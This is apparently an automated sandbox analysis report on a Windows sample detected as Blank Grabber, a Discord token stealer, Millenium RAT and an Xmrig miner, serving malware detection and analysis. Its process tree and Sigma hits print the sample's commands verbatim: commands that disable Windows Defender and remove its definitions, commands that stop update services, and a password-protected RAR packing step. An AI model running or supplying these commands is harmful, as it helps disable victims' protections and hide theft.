Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TS-240605-Millenium1.exe

Overview

General Information

Sample name:TS-240605-Millenium1.exe
Analysis ID:1452142
MD5:4ce7dec7f0af15277eec727a9e20142e
SHA1:5bae148e9a1865370d25d805439e60f057806a04
SHA256:fccf2be42bab41f3d1f8bb7778765729cdf5ed10a0bd65871ba3bd2b827c2402
Tags:exe
Infos:

Detection

Blank Grabber, Discord Token Stealer, Millenuim RAT, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Blank Grabber
Yara detected Discord Token Stealer
Yara detected Millenuim RAT
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries Google from non browser process on port 80
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: System File Execution Location Anomaly
Stops critical windows services
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • TS-240605-Millenium1.exe (PID: 7564 cmdline: "C:\Users\user\Desktop\TS-240605-Millenium1.exe" MD5: 4CE7DEC7F0AF15277EEC727A9E20142E)
    • TS-240605-Millenium1.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\TS-240605-Millenium1.exe" MD5: 4CE7DEC7F0AF15277EEC727A9E20142E)
      • cmd.exe (PID: 7680 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Build.exe (PID: 7736 cmdline: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe -pbeznogym MD5: B72CBBAF7F2E3E31E90944AC747798D3)
          • hacn.exe (PID: 7800 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)
            • hacn.exe (PID: 7856 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)
              • cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • s.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym MD5: 8198AD352AB70C2C974AB5C716956CD7)
                  • main.exe (PID: 5064 cmdline: "C:\ProgramData\main.exe" MD5: 5DF3E2C717F267899F37EC6E8FC7F47A)
                    • cmd.exe (PID: 3796 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp3F5C.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • Conhost.exe (PID: 2112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • tasklist.exe (PID: 7296 cmdline: Tasklist /fi "PID eq 5064" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                      • find.exe (PID: 648 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                      • timeout.exe (PID: 7956 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
                        • Conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • tasklist.exe (PID: 7924 cmdline: Tasklist /fi "PID eq 5064" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                      • find.exe (PID: 7928 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                      • timeout.exe (PID: 7728 cmdline: Timeout /T 1 /Nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
                      • tasklist.exe (PID: 3740 cmdline: Tasklist /fi "PID eq 5064" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                      • find.exe (PID: 7352 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                  • svchost.exe (PID: 4944 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)
                    • svchost.exe (PID: 5952 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)
                      • cmd.exe (PID: 2028 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • setup.exe (PID: 5084 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
                    • dialer.exe (PID: 7448 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
                      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
                      • updater.exe (PID: 7324 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
                      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
                      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
                      • Conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • Conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • based.exe (PID: 7812 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 363F8437904AD603ECDF0D5329610D88)
            • based.exe (PID: 7840 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: 363F8437904AD603ECDF0D5329610D88)
              • cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 8160 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
              • cmd.exe (PID: 8064 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 8152 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
              • cmd.exe (PID: 3052 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 7700 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                  • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • Conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 4108 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • tasklist.exe (PID: 7732 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 3608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • rar.exe (PID: 2816 cmdline: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
              • cmd.exe (PID: 7920 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • WMIC.exe (PID: 5000 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
              • cmd.exe (PID: 560 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7860 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2364 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7248 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7928 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 5468 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • sc.exe (PID: 7712 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
  • powershell.exe (PID: 3428 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\_MEI78122\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
        C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
          C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_MillenuimRATYara detected Millenuim RATJoe Security
            C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              Click to see the 10 entries
              SourceRuleDescriptionAuthorStrings
              00000008.00000003.1893866144.000001EB87185000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                00000008.00000003.1894173592.000001EB87185000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  00000007.00000003.1878137948.00000235B9F86000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                    00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      00000008.00000002.2123594352.000001EB87280000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                        Click to see the 18 entries
                        SourceRuleDescriptionAuthorStrings
                        21.0.main.exe.25eb5a3ef04.2.raw.unpackJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                          21.0.main.exe.25eb5a3ef04.2.raw.unpackJoeSecurity_MillenuimRATYara detected Millenuim RATJoe Security
                            21.0.main.exe.25eb5a3ef04.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                              21.0.main.exe.25eb5a3ef04.2.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                                21.0.main.exe.25eb5a30000.0.unpackJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                                  Click to see the 7 entries

                                  Operating System Destruction

                                  barindex
                                  Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7860, ProcessName: cmd.exe

                                  System Summary

                                  barindex
                                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ProcessId: 7924, TargetFilename: C:\ProgramData\svchost.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7840, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 8056, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7840, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 8064, ProcessName: cmd.exe
                                  Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7840, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", ProcessId: 7820, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ParentProcessId: 7924, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 4944, ProcessName: svchost.exe
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\ProgramData\svchost.exe, ProcessId: 5952, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\??????????
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 7840, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 8056, ProcessName: cmd.exe
                                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe, ParentProcessId: 7924, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 4944, ProcessName: svchost.exe
                                  Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7820, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe a -r -hp"prometheus" "C:\Users\user\AppData\Local\Temp\wpNXr.zip" *, ProcessId: 2816, ProcessName: rar.exe
                                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8064, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 8152, ProcessName: powershell.exe
